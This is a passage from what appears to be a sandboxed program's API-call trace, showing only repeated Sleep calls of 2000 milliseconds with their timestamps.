(dwMilliseconds=0x7d0) [0113.856] Sleep (dwMilliseconds=0x7d0) [0113.869] Sleep (dwMilliseconds=0x7d0) [0113.884] Sleep (dwMilliseconds=0x7d0) [0113.901] Sleep (dwMilliseconds=0x7d0) [0113.917] Sleep (dwMilliseconds=0x7d0) [0113.932] Sleep (dwMilliseconds=0x7d0) [0113.948] Sleep (dwMilliseconds=0x7d0) [0113.962] Sleep (dwMilliseconds=0x7d0) [0113.979] Sleep (dwMilliseconds=0x7d0) [0113.994] Sleep (dwMilliseconds=0x7d0) [0114.009] Sleep (dwMilliseconds=0x7d0) [0114.026] Sleep (dwMilliseconds=0x7d0) [0114.041] Sleep (dwMilliseconds=0x7d0) [0114.056] Sleep (dwMilliseconds=0x7d0) [0114.071] Sleep (dwMilliseconds=0x7d0) [0114.087] Sleep (dwMilliseconds=0x7d0) [0114.103] Sleep (dwMilliseconds=0x7d0) [0114.119] Sleep (dwMilliseconds=0x7d0) [0114.134] Sleep (dwMilliseconds=0x7d0) [0114.151] Sleep (dwMilliseconds=0x7d0) [0114.165] Sleep (dwMilliseconds=0x7d0) [0114.181] Sleep (dwMilliseconds=0x7d0) [0114.197] Sleep (dwMilliseconds=0x7d0) [0114.213] Sleep (dwMilliseconds=0x7d0) [0114.228] Sleep (dwMilliseconds=0x7d0) [0114.243] Sleep (dwMilliseconds=0x7d0) [0114.260] Sleep (dwMilliseconds=0x7d0) [0114.275] Sleep (dwMilliseconds=0x7d0) [0114.290] Sleep (dwMilliseconds=0x7d0) [0114.306] Sleep (dwMilliseconds=0x7d0) [0114.338] Sleep (dwMilliseconds=0x7d0) [0114.353] Sleep (dwMilliseconds=0x7d0) [0114.369] Sleep (dwMilliseconds=0x7d0) [0114.384] Sleep (dwMilliseconds=0x7d0) [0114.401] Sleep (dwMilliseconds=0x7d0) [0114.414] Sleep (dwMilliseconds=0x7d0) [0114.431] Sleep (dwMilliseconds=0x7d0) [0114.447] Sleep (dwMilliseconds=0x7d0) [0114.462] Sleep (dwMilliseconds=0x7d0) [0114.484] Sleep (dwMilliseconds=0x7d0) [0114.493] Sleep (dwMilliseconds=0x7d0) [0114.509] Sleep (dwMilliseconds=0x7d0) [0114.526] Sleep (dwMilliseconds=0x7d0) [0114.540] Sleep (dwMilliseconds=0x7d0) [0114.556] Sleep (dwMilliseconds=0x7d0) [0114.571] Sleep (dwMilliseconds=0x7d0) [0114.588] Sleep (dwMilliseconds=0x7d0) [0114.606] Sleep (dwMilliseconds=0x7d0) [0114.618] Sleep (dwMilliseconds=0x7d0) [0114.634] Sleep (dwMilliseconds=0x7d0) [0114.649] Sleep (dwMilliseconds=0x7d0) [0114.666] Sleep (dwMilliseconds=0x7d0) [0114.681] Sleep (dwMilliseconds=0x7d0) [0114.697] Sleep (dwMilliseconds=0x7d0) [0114.712] Sleep (dwMilliseconds=0x7d0) [0114.728] Sleep (dwMilliseconds=0x7d0) [0114.743] Sleep (dwMilliseconds=0x7d0) [0114.760] Sleep (dwMilliseconds=0x7d0) [0114.774] Sleep (dwMilliseconds=0x7d0) [0114.792] Sleep (dwMilliseconds=0x7d0) [0114.805] Sleep (dwMilliseconds=0x7d0) [0114.834] Sleep (dwMilliseconds=0x7d0) [0114.852] Sleep (dwMilliseconds=0x7d0) [0114.868] Sleep (dwMilliseconds=0x7d0) [0114.883] Sleep (dwMilliseconds=0x7d0) [0114.900] Sleep (dwMilliseconds=0x7d0) [0114.915] Sleep (dwMilliseconds=0x7d0) [0114.931] Sleep (dwMilliseconds=0x7d0) [0114.947] Sleep (dwMilliseconds=0x7d0) [0114.961] Sleep (dwMilliseconds=0x7d0) [0114.977] Sleep (dwMilliseconds=0x7d0) [0114.992] Sleep (dwMilliseconds=0x7d0) [0115.008] Sleep (dwMilliseconds=0x7d0) [0115.024] Sleep (dwMilliseconds=0x7d0) [0115.039] Sleep (dwMilliseconds=0x7d0) [0115.055] Sleep (dwMilliseconds=0x7d0) [0115.071] Sleep (dwMilliseconds=0x7d0) [0115.086] Sleep (dwMilliseconds=0x7d0) [0115.101] Sleep (dwMilliseconds=0x7d0) [0115.119] Sleep (dwMilliseconds=0x7d0) [0115.144] Sleep (dwMilliseconds=0x7d0) [0115.164] Sleep (dwMilliseconds=0x7d0) [0115.180] Sleep (dwMilliseconds=0x7d0) [0115.195] Sleep (dwMilliseconds=0x7d0) [0115.215] Sleep (dwMilliseconds=0x7d0) [0115.227] Sleep (dwMilliseconds=0x7d0) [0115.242] Sleep (dwMilliseconds=0x7d0) [0115.258] Sleep (dwMilliseconds=0x7d0) [0115.273] Sleep (dwMilliseconds=0x7d0) [0115.289] Sleep (dwMilliseconds=0x7d0) [0115.304] Sleep (dwMilliseconds=0x7d0) [0115.337] Sleep (dwMilliseconds=0x7d0) [0115.354] Sleep (dwMilliseconds=0x7d0) [0115.367] Sleep (dwMilliseconds=0x7d0) [0115.383] Sleep (dwMilliseconds=0x7d0) [0115.399] Sleep (dwMilliseconds=0x7d0) [0115.415] Sleep (dwMilliseconds=0x7d0) [0115.429] Sleep (dwMilliseconds=0x7d0) [0115.446] Sleep (dwMilliseconds=0x7d0) [0115.460] Sleep (dwMilliseconds=0x7d0) [0115.477] Sleep (dwMilliseconds=0x7d0) [0115.492] Sleep (dwMilliseconds=0x7d0) [0115.507] Sleep (dwMilliseconds=0x7d0) [0115.522] Sleep (dwMilliseconds=0x7d0) [0115.543] Sleep (dwMilliseconds=0x7d0) [0115.554] Sleep (dwMilliseconds=0x7d0) [0115.571] Sleep (dwMilliseconds=0x7d0) [0115.591] Sleep (dwMilliseconds=0x7d0) [0115.601] Sleep (dwMilliseconds=0x7d0) [0115.616] Sleep (dwMilliseconds=0x7d0) [0115.632] Sleep (dwMilliseconds=0x7d0) [0115.649] Sleep (dwMilliseconds=0x7d0) [0115.663] Sleep (dwMilliseconds=0x7d0) [0115.679] Sleep (dwMilliseconds=0x7d0) [0115.697] Sleep (dwMilliseconds=0x7d0) [0115.709] Sleep (dwMilliseconds=0x7d0) [0115.726] Sleep (dwMilliseconds=0x7d0) [0115.742] Sleep (dwMilliseconds=0x7d0) [0115.758] Sleep (dwMilliseconds=0x7d0) [0115.772] Sleep (dwMilliseconds=0x7d0) [0115.836] Sleep (dwMilliseconds=0x7d0) [0115.854] Sleep (dwMilliseconds=0x7d0) [0115.866] Sleep (dwMilliseconds=0x7d0) [0115.887] Sleep (dwMilliseconds=0x7d0) [0115.896] Sleep (dwMilliseconds=0x7d0) [0115.912] Sleep (dwMilliseconds=0x7d0) [0115.929] Sleep (dwMilliseconds=0x7d0) [0115.948] Sleep (dwMilliseconds=0x7d0) [0115.959] Sleep (dwMilliseconds=0x7d0) [0115.995] Sleep (dwMilliseconds=0x7d0) [0116.006] Sleep (dwMilliseconds=0x7d0) [0116.021] Sleep (dwMilliseconds=0x7d0) [0116.041] Sleep (dwMilliseconds=0x7d0) [0116.053] Sleep (dwMilliseconds=0x7d0) [0116.071] Sleep (dwMilliseconds=0x7d0) [0116.083] Sleep (dwMilliseconds=0x7d0) [0116.100] Sleep (dwMilliseconds=0x7d0) [0116.118] Sleep (dwMilliseconds=0x7d0) [0116.130] Sleep (dwMilliseconds=0x7d0) [0116.147] Sleep (dwMilliseconds=0x7d0) [0116.162] Sleep (dwMilliseconds=0x7d0) [0116.181] Sleep (dwMilliseconds=0x7d0) [0116.193] Sleep (dwMilliseconds=0x7d0) [0116.209] Sleep (dwMilliseconds=0x7d0) [0116.225] Sleep (dwMilliseconds=0x7d0) [0116.240] Sleep (dwMilliseconds=0x7d0) [0116.256] Sleep (dwMilliseconds=0x7d0) [0116.272] Sleep (dwMilliseconds=0x7d0) [0116.291] Sleep (dwMilliseconds=0x7d0) [0116.302] Sleep (dwMilliseconds=0x7d0) [0116.318] Sleep (dwMilliseconds=0x7d0) [0116.334] Sleep (dwMilliseconds=0x7d0) [0116.349] Sleep (dwMilliseconds=0x7d0) [0116.381] Sleep (dwMilliseconds=0x7d0) [0116.397] Sleep (dwMilliseconds=0x7d0) [0116.412] Sleep (dwMilliseconds=0x7d0) [0116.427] Sleep (dwMilliseconds=0x7d0) [0116.464] Sleep (dwMilliseconds=0x7d0) [0116.474] Sleep (dwMilliseconds=0x7d0) [0116.491] Sleep (dwMilliseconds=0x7d0) [0116.506] Sleep (dwMilliseconds=0x7d0) [0116.521] Sleep (dwMilliseconds=0x7d0) [0116.536] Sleep (dwMilliseconds=0x7d0) [0116.552] Sleep (dwMilliseconds=0x7d0) [0116.567] Sleep (dwMilliseconds=0x7d0) [0116.586] Sleep (dwMilliseconds=0x7d0) [0116.598] Sleep (dwMilliseconds=0x7d0) [0116.622] Sleep (dwMilliseconds=0x7d0) [0116.664] Sleep (dwMilliseconds=0x7d0) [0116.701] Sleep (dwMilliseconds=0x7d0) [0116.739] Sleep (dwMilliseconds=0x7d0) [0116.755] Sleep (dwMilliseconds=0x7d0) [0117.165] Sleep (dwMilliseconds=0x7d0) [0117.180] Sleep (dwMilliseconds=0x7d0) [0117.210] Sleep (dwMilliseconds=0x7d0) [0117.223] Sleep (dwMilliseconds=0x7d0) [0117.256] Sleep (dwMilliseconds=0x7d0) [0117.272] Sleep (dwMilliseconds=0x7d0) [0117.304] Sleep (dwMilliseconds=0x7d0) [0117.340] Sleep (dwMilliseconds=0x7d0) [0117.348] Sleep (dwMilliseconds=0x7d0) [0117.365] Sleep (dwMilliseconds=0x7d0) [0117.382] Sleep (dwMilliseconds=0x7d0) [0117.397] Sleep (dwMilliseconds=0x7d0) [0117.412] Sleep (dwMilliseconds=0x7d0) [0117.429] Sleep (dwMilliseconds=0x7d0) [0117.441] Sleep (dwMilliseconds=0x7d0) [0117.461] Sleep (dwMilliseconds=0x7d0) [0117.487] Sleep (dwMilliseconds=0x7d0) [0117.504] Sleep (dwMilliseconds=0x7d0) [0117.519] Sleep (dwMilliseconds=0x7d0) [0117.535] Sleep (dwMilliseconds=0x7d0) [0117.551] Sleep (dwMilliseconds=0x7d0) [0117.583] Sleep (dwMilliseconds=0x7d0) [0117.601] Sleep (dwMilliseconds=0x7d0) [0117.612] Sleep (dwMilliseconds=0x7d0) [0117.628] Sleep (dwMilliseconds=0x7d0) [0117.644] Sleep (dwMilliseconds=0x7d0) [0117.659] Sleep (dwMilliseconds=0x7d0) [0117.675] Sleep (dwMilliseconds=0x7d0) [0117.691] Sleep (dwMilliseconds=0x7d0) [0117.712] Sleep (dwMilliseconds=0x7d0) [0117.722] Sleep (dwMilliseconds=0x7d0) [0117.738] Sleep (dwMilliseconds=0x7d0) [0117.781] Sleep (dwMilliseconds=0x7d0) [0117.801] Sleep (dwMilliseconds=0x7d0) [0117.816] Sleep (dwMilliseconds=0x7d0) [0117.831] Sleep (dwMilliseconds=0x7d0) [0117.847] Sleep (dwMilliseconds=0x7d0) [0117.864] Sleep (dwMilliseconds=0x7d0) [0117.878] Sleep (dwMilliseconds=0x7d0) [0117.894] Sleep (dwMilliseconds=0x7d0) [0117.912] Sleep (dwMilliseconds=0x7d0) [0117.925] Sleep (dwMilliseconds=0x7d0) [0117.941] Sleep (dwMilliseconds=0x7d0) [0117.957] Sleep (dwMilliseconds=0x7d0) [0117.972] Sleep (dwMilliseconds=0x7d0) [0117.988] Sleep (dwMilliseconds=0x7d0) [0118.003] Sleep (dwMilliseconds=0x7d0) [0118.020] Sleep (dwMilliseconds=0x7d0) [0118.060] Sleep (dwMilliseconds=0x7d0) [0118.065] Sleep (dwMilliseconds=0x7d0) [0118.080] Sleep (dwMilliseconds=0x7d0) [0118.097] Sleep (dwMilliseconds=0x7d0) [0118.113] Sleep (dwMilliseconds=0x7d0) [0118.128] Sleep (dwMilliseconds=0x7d0) [0118.144] Sleep (dwMilliseconds=0x7d0) [0118.169] Sleep (dwMilliseconds=0x7d0) [0118.174] Sleep (dwMilliseconds=0x7d0) [0118.190] Sleep (dwMilliseconds=0x7d0) [0118.206] Sleep (dwMilliseconds=0x7d0) [0118.221] Sleep (dwMilliseconds=0x7d0) [0118.237] Sleep (dwMilliseconds=0x7d0) [0118.251] Sleep (dwMilliseconds=0x7d0) [0118.274] Sleep (dwMilliseconds=0x7d0) [0118.283] Sleep (dwMilliseconds=0x7d0) [0118.301] Sleep (dwMilliseconds=0x7d0) [0118.318] Sleep (dwMilliseconds=0x7d0) [0118.330] Sleep (dwMilliseconds=0x7d0) [0118.349] Sleep (dwMilliseconds=0x7d0) [0118.364] Sleep (dwMilliseconds=0x7d0) [0118.376] Sleep (dwMilliseconds=0x7d0) [0118.394] Sleep (dwMilliseconds=0x7d0) [0118.409] Sleep (dwMilliseconds=0x7d0) [0118.425] Sleep (dwMilliseconds=0x7d0) [0118.440] Sleep (dwMilliseconds=0x7d0) [0118.456] Sleep (dwMilliseconds=0x7d0) [0118.472] Sleep (dwMilliseconds=0x7d0) [0118.490] Sleep (dwMilliseconds=0x7d0) [0118.502] Sleep (dwMilliseconds=0x7d0) [0118.518] Sleep (dwMilliseconds=0x7d0) [0118.535] Sleep (dwMilliseconds=0x7d0) [0118.550] Sleep (dwMilliseconds=0x7d0) [0118.566] Sleep (dwMilliseconds=0x7d0) [0118.581] Sleep (dwMilliseconds=0x7d0) [0118.595] Sleep (dwMilliseconds=0x7d0) [0118.612] Sleep (dwMilliseconds=0x7d0) [0118.635] Sleep (dwMilliseconds=0x7d0) [0118.641] Sleep (dwMilliseconds=0x7d0) [0118.659] Sleep (dwMilliseconds=0x7d0) [0118.674] Sleep (dwMilliseconds=0x7d0) [0118.690] Sleep (dwMilliseconds=0x7d0) [0118.706] Sleep (dwMilliseconds=0x7d0) [0118.722] Sleep (dwMilliseconds=0x7d0) [0118.737] Sleep (dwMilliseconds=0x7d0) [0118.773] Sleep (dwMilliseconds=0x7d0) [0118.783] Sleep (dwMilliseconds=0x7d0) [0118.799] Sleep (dwMilliseconds=0x7d0) [0118.815] Sleep (dwMilliseconds=0x7d0) [0118.831] Sleep (dwMilliseconds=0x7d0) [0118.846] Sleep (dwMilliseconds=0x7d0) [0118.862] Sleep (dwMilliseconds=0x7d0) [0118.877] Sleep (dwMilliseconds=0x7d0) [0118.893] Sleep (dwMilliseconds=0x7d0) [0118.908] Sleep (dwMilliseconds=0x7d0) [0118.924] Sleep (dwMilliseconds=0x7d0) [0118.940] Sleep (dwMilliseconds=0x7d0) [0118.955] Sleep (dwMilliseconds=0x7d0) [0118.972] Sleep (dwMilliseconds=0x7d0) [0118.986] Sleep (dwMilliseconds=0x7d0) [0119.002] Sleep (dwMilliseconds=0x7d0) [0119.017] Sleep (dwMilliseconds=0x7d0) [0119.033] Sleep (dwMilliseconds=0x7d0) [0119.053] Sleep (dwMilliseconds=0x7d0) [0119.063] Sleep (dwMilliseconds=0x7d0) [0119.081] Sleep (dwMilliseconds=0x7d0) [0119.095] Sleep (dwMilliseconds=0x7d0) [0119.111] Sleep (dwMilliseconds=0x7d0) [0119.127] Sleep (dwMilliseconds=0x7d0) [0119.142] Sleep (dwMilliseconds=0x7d0) [0119.158] Sleep (dwMilliseconds=0x7d0) [0119.177] Sleep (dwMilliseconds=0x7d0) [0119.189] Sleep (dwMilliseconds=0x7d0) [0119.204] Sleep (dwMilliseconds=0x7d0) [0119.220] Sleep (dwMilliseconds=0x7d0) [0119.236] Sleep (dwMilliseconds=0x7d0) [0119.253] Sleep (dwMilliseconds=0x7d0) [0119.266] Sleep (dwMilliseconds=0x7d0) [0119.285] Sleep (dwMilliseconds=0x7d0) [0119.298] Sleep (dwMilliseconds=0x7d0) [0119.315] Sleep (dwMilliseconds=0x7d0) [0119.331] Sleep (dwMilliseconds=0x7d0) [0119.345] Sleep (dwMilliseconds=0x7d0) [0119.360] Sleep (dwMilliseconds=0x7d0) [0119.376] Sleep (dwMilliseconds=0x7d0) [0119.392] Sleep (dwMilliseconds=0x7d0) [0119.407] Sleep (dwMilliseconds=0x7d0) [0119.423] Sleep (dwMilliseconds=0x7d0) [0119.439] Sleep (dwMilliseconds=0x7d0) [0119.455] Sleep (dwMilliseconds=0x7d0) [0119.471] Sleep (dwMilliseconds=0x7d0) [0119.486] Sleep (dwMilliseconds=0x7d0) [0119.501] Sleep (dwMilliseconds=0x7d0) [0119.517] Sleep (dwMilliseconds=0x7d0) [0119.532] Sleep (dwMilliseconds=0x7d0) [0119.549] Sleep (dwMilliseconds=0x7d0) [0119.563] Sleep (dwMilliseconds=0x7d0) [0119.579] Sleep (dwMilliseconds=0x7d0) [0119.595] Sleep (dwMilliseconds=0x7d0) [0119.613] Sleep (dwMilliseconds=0x7d0) [0119.630] Sleep (dwMilliseconds=0x7d0) [0119.644] Sleep (dwMilliseconds=0x7d0) [0119.657] Sleep (dwMilliseconds=0x7d0) [0119.673] Sleep (dwMilliseconds=0x7d0) [0119.688] Sleep (dwMilliseconds=0x7d0) [0119.705] Sleep (dwMilliseconds=0x7d0) [0119.720] Sleep (dwMilliseconds=0x7d0) [0119.736] Sleep (dwMilliseconds=0x7d0) [0119.770] Sleep (dwMilliseconds=0x7d0) [0119.781] Sleep (dwMilliseconds=0x7d0) [0119.803] Sleep (dwMilliseconds=0x7d0) [0119.816] Sleep (dwMilliseconds=0x7d0) [0119.835] Sleep (dwMilliseconds=0x7d0) [0119.845] Sleep (dwMilliseconds=0x7d0) [0119.859] Sleep (dwMilliseconds=0x7d0) [0119.878] Sleep (dwMilliseconds=0x7d0) [0119.891] Sleep (dwMilliseconds=0x7d0) [0119.908] Sleep (dwMilliseconds=0x7d0) [0119.922] Sleep (dwMilliseconds=0x7d0) [0119.938] Sleep (dwMilliseconds=0x7d0) [0119.953] Sleep (dwMilliseconds=0x7d0) [0119.969] Sleep (dwMilliseconds=0x7d0) [0119.985] Sleep (dwMilliseconds=0x7d0) [0120.000] Sleep (dwMilliseconds=0x7d0) [0120.017] Sleep (dwMilliseconds=0x7d0) [0120.032] Sleep (dwMilliseconds=0x7d0) [0120.047] Sleep (dwMilliseconds=0x7d0) [0120.063] Sleep (dwMilliseconds=0x7d0) [0120.078] Sleep (dwMilliseconds=0x7d0) [0120.093] Sleep (dwMilliseconds=0x7d0) [0120.109] Sleep (dwMilliseconds=0x7d0) [0120.125] Sleep (dwMilliseconds=0x7d0) [0120.141] Sleep (dwMilliseconds=0x7d0) [0120.158] Sleep (dwMilliseconds=0x7d0) [0120.188] Sleep (dwMilliseconds=0x7d0) [0120.202] Sleep (dwMilliseconds=0x7d0) [0120.219] Sleep (dwMilliseconds=0x7d0) [0120.235] Sleep (dwMilliseconds=0x7d0) [0120.251] Sleep (dwMilliseconds=0x7d0) [0120.266] Sleep (dwMilliseconds=0x7d0) [0120.280] Sleep (dwMilliseconds=0x7d0) [0120.298] Sleep (dwMilliseconds=0x7d0) [0120.312] Sleep (dwMilliseconds=0x7d0) [0120.328] Sleep (dwMilliseconds=0x7d0) [0120.347] Sleep (dwMilliseconds=0x7d0) [0120.359] Sleep (dwMilliseconds=0x7d0) [0120.374] Sleep (dwMilliseconds=0x7d0) [0120.389] Sleep (dwMilliseconds=0x7d0) [0120.406] Sleep (dwMilliseconds=0x7d0) [0120.421] Sleep (dwMilliseconds=0x7d0) [0120.440] Sleep (dwMilliseconds=0x7d0) [0120.452] Sleep (dwMilliseconds=0x7d0) [0120.468] Sleep (dwMilliseconds=0x7d0) [0120.484] Sleep (dwMilliseconds=0x7d0) [0120.499] Sleep (dwMilliseconds=0x7d0) [0120.517] Sleep (dwMilliseconds=0x7d0) [0120.530] Sleep (dwMilliseconds=0x7d0) [0120.548] Sleep (dwMilliseconds=0x7d0) [0120.563] Sleep (dwMilliseconds=0x7d0) [0120.578] Sleep (dwMilliseconds=0x7d0) [0120.593] Sleep (dwMilliseconds=0x7d0) [0120.608] Sleep (dwMilliseconds=0x7d0) [0120.624] Sleep (dwMilliseconds=0x7d0) [0120.644] Sleep (dwMilliseconds=0x7d0) [0120.655] Sleep (dwMilliseconds=0x7d0) [0120.671] Sleep (dwMilliseconds=0x7d0) [0120.687] Sleep (dwMilliseconds=0x7d0) [0120.704] Sleep (dwMilliseconds=0x7d0) [0120.718] Sleep (dwMilliseconds=0x7d0) [0120.733] Sleep (dwMilliseconds=0x7d0) [0120.766] Sleep (dwMilliseconds=0x7d0) [0120.780] Sleep (dwMilliseconds=0x7d0) [0120.801] Sleep (dwMilliseconds=0x7d0) [0120.817] Sleep (dwMilliseconds=0x7d0) [0120.826] Sleep (dwMilliseconds=0x7d0) [0120.842] Sleep (dwMilliseconds=0x7d0) [0120.858] Sleep (dwMilliseconds=0x7d0) [0120.875] Sleep (dwMilliseconds=0x7d0) [0120.890] Sleep (dwMilliseconds=0x7d0) [0120.905] Sleep (dwMilliseconds=0x7d0) [0120.921] Sleep (dwMilliseconds=0x7d0) [0120.936] Sleep (dwMilliseconds=0x7d0) [0120.952] Sleep (dwMilliseconds=0x7d0) [0120.967] Sleep (dwMilliseconds=0x7d0) [0120.984] Sleep (dwMilliseconds=0x7d0) [0120.998] Sleep (dwMilliseconds=0x7d0) [0121.028] Sleep (dwMilliseconds=0x7d0) [0121.053] Sleep (dwMilliseconds=0x7d0) [0121.061] Sleep (dwMilliseconds=0x7d0) [0121.077] Sleep (dwMilliseconds=0x7d0) [0121.094] Sleep (dwMilliseconds=0x7d0) [0121.108] Sleep (dwMilliseconds=0x7d0) [0121.123] Sleep (dwMilliseconds=0x7d0) [0121.139] Sleep (dwMilliseconds=0x7d0) [0121.154] Sleep (dwMilliseconds=0x7d0) [0121.182] Sleep (dwMilliseconds=0x7d0) [0121.202] Sleep (dwMilliseconds=0x7d0) [0121.217] Sleep (dwMilliseconds=0x7d0) [0121.233] Sleep (dwMilliseconds=0x7d0) [0121.248] Sleep (dwMilliseconds=0x7d0) [0121.265] Sleep (dwMilliseconds=0x7d0) [0121.283] Sleep (dwMilliseconds=0x7d0) [0121.295] Sleep (dwMilliseconds=0x7d0) [0121.314] Sleep (dwMilliseconds=0x7d0) [0121.334] Sleep (dwMilliseconds=0x7d0) [0121.341] Sleep (dwMilliseconds=0x7d0) [0121.362] Sleep (dwMilliseconds=0x7d0) [0121.374] Sleep (dwMilliseconds=0x7d0) [0121.389] Sleep (dwMilliseconds=0x7d0) [0121.405] Sleep (dwMilliseconds=0x7d0) [0121.421] Sleep (dwMilliseconds=0x7d0) [0121.435] Sleep (dwMilliseconds=0x7d0) [0121.451] Sleep (dwMilliseconds=0x7d0) [0121.477] Sleep (dwMilliseconds=0x7d0) [0121.483] Sleep (dwMilliseconds=0x7d0) [0121.497] Sleep (dwMilliseconds=0x7d0) [0121.518] Sleep (dwMilliseconds=0x7d0) [0121.529] Sleep (dwMilliseconds=0x7d0) [0121.545] Sleep (dwMilliseconds=0x7d0) [0121.560] Sleep (dwMilliseconds=0x7d0) [0121.575] Sleep (dwMilliseconds=0x7d0) [0121.591] Sleep (dwMilliseconds=0x7d0) [0121.607] Sleep (dwMilliseconds=0x7d0) [0121.623] Sleep (dwMilliseconds=0x7d0) [0121.638] Sleep (dwMilliseconds=0x7d0) [0121.675] Sleep (dwMilliseconds=0x7d0) [0121.685] Sleep (dwMilliseconds=0x7d0) [0121.700] Sleep (dwMilliseconds=0x7d0) [0121.717] Sleep (dwMilliseconds=0x7d0) [0121.732] Sleep (dwMilliseconds=0x7d0) [0121.775] Sleep (dwMilliseconds=0x7d0) [0121.794] Sleep (dwMilliseconds=0x7d0) [0121.809] Sleep (dwMilliseconds=0x7d0) [0121.826] Sleep (dwMilliseconds=0x7d0) [0121.841] Sleep (dwMilliseconds=0x7d0) [0121.856] Sleep (dwMilliseconds=0x7d0) [0121.871] Sleep (dwMilliseconds=0x7d0) [0121.890] Sleep (dwMilliseconds=0x7d0) [0121.905] Sleep (dwMilliseconds=0x7d0) [0121.918] Sleep (dwMilliseconds=0x7d0) [0121.936] Sleep (dwMilliseconds=0x7d0) [0121.951] Sleep (dwMilliseconds=0x7d0) [0121.965] Sleep (dwMilliseconds=0x7d0) [0121.984] Sleep (dwMilliseconds=0x7d0) [0121.997] Sleep (dwMilliseconds=0x7d0) [0122.012] Sleep (dwMilliseconds=0x7d0) [0122.040] Sleep (dwMilliseconds=0x7d0) [0122.060] Sleep (dwMilliseconds=0x7d0) [0122.076] Sleep (dwMilliseconds=0x7d0) [0122.091] Sleep (dwMilliseconds=0x7d0) [0122.106] Sleep (dwMilliseconds=0x7d0) [0122.122] Sleep (dwMilliseconds=0x7d0) [0122.137] Sleep (dwMilliseconds=0x7d0) [0122.153] Sleep (dwMilliseconds=0x7d0) [0122.168] Sleep (dwMilliseconds=0x7d0) [0122.183] Sleep (dwMilliseconds=0x7d0) [0122.200] Sleep (dwMilliseconds=0x7d0) [0122.217] Sleep (dwMilliseconds=0x7d0) [0122.230] Sleep (dwMilliseconds=0x7d0) [0122.247] Sleep (dwMilliseconds=0x7d0) [0122.261] Sleep (dwMilliseconds=0x7d0) [0122.278] Sleep (dwMilliseconds=0x7d0) [0122.293] Sleep (dwMilliseconds=0x7d0) [0122.315] Sleep (dwMilliseconds=0x7d0) [0122.325] Sleep (dwMilliseconds=0x7d0) [0122.341] Sleep (dwMilliseconds=0x7d0) [0122.355] Sleep (dwMilliseconds=0x7d0) [0122.374] Sleep (dwMilliseconds=0x7d0) [0122.387] Sleep (dwMilliseconds=0x7d0) [0122.402] Sleep (dwMilliseconds=0x7d0) [0122.420] Sleep (dwMilliseconds=0x7d0) [0122.433] Sleep (dwMilliseconds=0x7d0) [0122.450] Sleep (dwMilliseconds=0x7d0) [0122.466] Sleep (dwMilliseconds=0x7d0) [0122.481] Sleep (dwMilliseconds=0x7d0) [0122.496] Sleep (dwMilliseconds=0x7d0) [0122.512] Sleep (dwMilliseconds=0x7d0) [0122.527] Sleep (dwMilliseconds=0x7d0) [0122.544] Sleep (dwMilliseconds=0x7d0) [0122.559] Sleep (dwMilliseconds=0x7d0) [0122.576] Sleep (dwMilliseconds=0x7d0) [0122.590] Sleep (dwMilliseconds=0x7d0) [0122.608] Sleep (dwMilliseconds=0x7d0) [0122.621] Sleep (dwMilliseconds=0x7d0) [0122.637] Sleep (dwMilliseconds=0x7d0) [0122.659] Sleep (dwMilliseconds=0x7d0) [0122.673] Sleep (dwMilliseconds=0x7d0) [0122.684] Sleep (dwMilliseconds=0x7d0) [0122.700] Sleep (dwMilliseconds=0x7d0) [0122.721] Sleep (dwMilliseconds=0x7d0) [0122.730] Sleep (dwMilliseconds=0x7d0) [0122.766] Sleep (dwMilliseconds=0x7d0) [0122.777] Sleep (dwMilliseconds=0x7d0) [0122.793] Sleep (dwMilliseconds=0x7d0) [0122.808] Sleep (dwMilliseconds=0x7d0) [0122.825] Sleep (dwMilliseconds=0x7d0) [0122.840] Sleep (dwMilliseconds=0x7d0) [0122.856] Sleep (dwMilliseconds=0x7d0) [0122.871] Sleep (dwMilliseconds=0x7d0) [0122.886] Sleep (dwMilliseconds=0x7d0) [0122.902] Sleep (dwMilliseconds=0x7d0) [0122.917] Sleep (dwMilliseconds=0x7d0) [0122.933] Sleep (dwMilliseconds=0x7d0) [0122.949] Sleep (dwMilliseconds=0x7d0) [0122.966] Sleep (dwMilliseconds=0x7d0) [0122.981] Sleep (dwMilliseconds=0x7d0) [0123.001] Sleep (dwMilliseconds=0x7d0) [0123.010] Sleep (dwMilliseconds=0x7d0) [0123.027] Sleep (dwMilliseconds=0x7d0) [0123.042] Sleep (dwMilliseconds=0x7d0) [0123.059] Sleep (dwMilliseconds=0x7d0) [0123.073] Sleep (dwMilliseconds=0x7d0) [0123.090] Sleep (dwMilliseconds=0x7d0) [0123.106] Sleep (dwMilliseconds=0x7d0) [0123.124] Sleep (dwMilliseconds=0x7d0) [0123.137] Sleep (dwMilliseconds=0x7d0) [0123.152] Sleep (dwMilliseconds=0x7d0) [0123.180] Sleep (dwMilliseconds=0x7d0) [0123.194] Sleep (dwMilliseconds=0x7d0) [0123.210] Sleep (dwMilliseconds=0x7d0) [0123.225] Sleep (dwMilliseconds=0x7d0) [0123.242] Sleep (dwMilliseconds=0x7d0) [0123.256] Sleep (dwMilliseconds=0x7d0) [0123.272] Sleep (dwMilliseconds=0x7d0) [0123.287] Sleep (dwMilliseconds=0x7d0) [0123.303] Sleep (dwMilliseconds=0x7d0) [0123.319] Sleep (dwMilliseconds=0x7d0) [0123.336] Sleep (dwMilliseconds=0x7d0) [0123.357] Sleep (dwMilliseconds=0x7d0) [0123.391] Sleep (dwMilliseconds=0x7d0) [0123.402] Sleep (dwMilliseconds=0x7d0) [0123.416] Sleep (dwMilliseconds=0x7d0) [0123.432] Sleep (dwMilliseconds=0x7d0) [0123.449] Sleep (dwMilliseconds=0x7d0) [0123.463] Sleep (dwMilliseconds=0x7d0) [0123.478] Sleep (dwMilliseconds=0x7d0) [0123.495] Sleep (dwMilliseconds=0x7d0) [0123.511] Sleep (dwMilliseconds=0x7d0) [0123.527] Sleep (dwMilliseconds=0x7d0) [0123.541] Sleep (dwMilliseconds=0x7d0) [0123.563] Sleep (dwMilliseconds=0x7d0) [0123.572] Sleep (dwMilliseconds=0x7d0) [0123.588] Sleep (dwMilliseconds=0x7d0) [0123.604] Sleep (dwMilliseconds=0x7d0) [0123.619] Sleep (dwMilliseconds=0x7d0) [0123.635] Sleep (dwMilliseconds=0x7d0) [0123.650] Sleep (dwMilliseconds=0x7d0) [0123.666] Sleep (dwMilliseconds=0x7d0) [0123.682] Sleep (dwMilliseconds=0x7d0) [0123.697] Sleep (dwMilliseconds=0x7d0) [0123.712] Sleep (dwMilliseconds=0x7d0) [0123.729] Sleep (dwMilliseconds=0x7d0) [0123.745] Sleep (dwMilliseconds=0x7d0) [0123.779] Sleep (dwMilliseconds=0x7d0) [0123.792] Sleep (dwMilliseconds=0x7d0) [0123.806] Sleep (dwMilliseconds=0x7d0) [0123.822] 